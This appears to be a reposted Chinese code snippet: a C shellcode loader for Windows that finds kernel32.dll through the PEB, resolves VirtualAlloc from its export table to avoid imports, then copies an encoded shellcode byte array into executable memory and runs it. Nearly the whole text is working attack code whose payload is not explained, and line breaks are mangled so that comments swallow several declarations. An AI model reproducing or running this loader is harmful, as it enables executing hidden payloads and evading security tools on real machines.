自己都看不懂系列转载自百度

执行代码如下：

# include<Windows.h>

# include<stdio.h>

/*获取kernel32.dll的基地址因为vc程序main函数之前会有初始化，所以不能通过堆栈栈顶值获取kernel32.dll中的地址因此通过 PEB 结构获取Kernel32.dll基址部分代码来自看雪论坛*/

DWORD _getKernelBase()
{DWORD dwPEB; DWORD dwLDR;
 DWORD dwInitList; DWORD dwDllBase;//当前地址 PIMAGE_DOS_HEADER pImageDosHeader;
//指向DOS头的指针 PIMAGE_NT_HEADERS pImageNtHeaders;
//指向NT头的指针 DWORD dwVirtualAddress;
//导出表偏移地址 PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
//指向导出表的指针 PTCHAR lpName;
//指向dll名字的指针 TCHAR szKernel32[] = TEXT("KERNEL32.dll");
 __asm { mov eax, FS: [0x30]
//获取PEB所在地址 
mov dwPEB, eax }
 dwLDR = *(PDWORD)(dwPEB + 0xc);
//获取PEB_LDR_DATA 结构指针 
dwInitList = *(PDWORD)(dwLDR + 0x1c);
//获取InInitializationOrderModuleList 链表头
//第一个LDR_MODULE节点InInitializationOrderModuleList成员的指针 
for (; dwDllBase = *(PDWORD)(dwInitList + 8);//结构偏移0x8处存放模块基址 
dwInitList = *(PDWORD)dwInitList//结构偏移0处存放下一模块结构的指针
 ) 
{ pImageDosHeader = (PIMAGE_DOS_HEADER)dwDllBase;
 pImageNtHeaders = (PIMAGE_NT_HEADERS)(dwDllBase + pImageDosHeader->e_lfanew);
 dwVirtualAddress = pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress;
//导出表偏移 pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(dwDllBase + dwVirtualAddress);
//导出表地址 lpName = (PTCHAR)(dwDllBase + pImageExportDirectory->Name);
//dll名字 
if (strlen(lpName) == 0xc && !strcmp(lpName, szKernel32))//判断是否为“KERNEL32.dll” {

return dwDllBase; } }

return 0;}

/*获取指定字符串的API函数的调用地址入口参数：_hModule为动态链接库的基址_lpApi为API函数名的首址出口参数：eax为函数在虚拟地址空间中的真实地址*/

DWORD _getApi(DWORD _hModule, PTCHAR _lpApi)
{DWORD i; DWORD dwLen;
 PIMAGE_DOS_HEADER pImageDosHeader;//指向DOS头的指针
 PIMAGE_NT_HEADERS pImageNtHeaders;//指向NT头的指针
 DWORD dwVirtualAddress;//导出表偏移地址 
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;//指向导出表的指针
 TCHAR** lpAddressOfNames; PWORD lpAddressOfNameOrdinals;//计算API字符串的长度 
for (i = 0; _lpApi[i]; ++i); dwLen = i; pImageDosHeader = (PIMAGE_DOS_HEADER)_hModule;
 pImageNtHeaders = (PIMAGE_NT_HEADERS)(_hModule + pImageDosHeader->e_lfanew); 
dwVirtualAddress = pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress;
//导出表偏移
 pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(_hModule + dwVirtualAddress);
//导出表地址 lpAddressOfNames = (TCHAR**)(_hModule + pImageExportDirectory->AddressOfNames);
//按名字导出函数列表 for (i = 0; _hModule + lpAddressOfNames[i]; ++i)
 {

if (strlen(_hModule + lpAddressOfNames[i]) == dwLen &&!strcmp(_hModule + lpAddressOfNames[i], _lpApi))
//判断是否为_lpApi
 { lpAddressOfNameOrdinals = (PWORD)(_hModule + pImageExportDirectory->AddressOfNameOrdinals);
//按名字导出函数索引列表
 return _hModule + ((PDWORD)(_hModule + pImageExportDirectory->AddressOfFunctions))[lpAddressOfNameOrdinals[i]];
//根据函数索引找到函数地址
 }
}

return 0;}

int main(){

unsigned char shellcode[] = "\x2b\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x65\x87\xbe\xd4\x83\xee\xfc\xe2\xf4\x99\x6f\x3c\xd4\x65\x87\xde\x5d\x80\xb6\x7e\xb0\xee\xd7\x8e\x5f\x37\x8b\x35\x86\x71\x0c\xcc\xfc\x6a\x30\xf4\xf2\x54\x78\x12\xe8\x04\xfb\xbc\xf8\x45\x46\x71\xd9\x64\x40\x5c\x26\x37\xd0\x35\x86\x75\x0c\xf4\xe8\xee\xcb\xaf\xac\x86\xcf\xbf\x05\x34\x0c\xe7\xf4\x64\x54\x35\x9d\x7d\x64\x84\x9d\xee\xb3\x35\xd5\xb3\xb6\x41\x78\xa4\x48\xb3\xd5\xa2\xbf\x5e\xa1\x93\x84\xc3\x2c\x5e\xfa\x9a\xa1\x81\xdf\x35\x8c\x41\x86\x6d\xb2\xee\x8b\xf5\x5f\x3d\x9b\xbf\x07\xee\x83\x35\xd5\xb5\x0e\xfa\xf0\x41\xdc\xe5\xb5\x3c\xdd\xef\x2b\x85\xd8\xe1\x8e\xee\x95\x55\x59\x38\xed\xbf\x59\xe0\x35\xbe\xd4\x65\xd7\xd6\xe5\xee\xe8\x39\x2b\xb0\x3c\x4e\x61\xc7\xd1\xd6\x72\xf0\x3a\x23\x2b\xb0\xbb\xb8\xa8\x6f\x07\x45\x34\x10\x82\x05\x93\x76\xf5\xd1\xbe\x65\xd4\x41\x01\x06\xe6\xd2\xb7\x4b\xe2\xc6\xb1\x65\x87\xbe\xd4"; TCHAR szVirAlloc[] = TEXT("VirtualAlloc");

typedef LPVOID(WINAPI* VirtualAllocB)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 
VirtualAllocB p = (VirtualAllocB)_getApi(_getKernelBase(), szVirAlloc);
char* a = (char*)(*p)(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(a, shellcode, sizeof(shellcode)); (*(void(*)())a)();

return 0;
}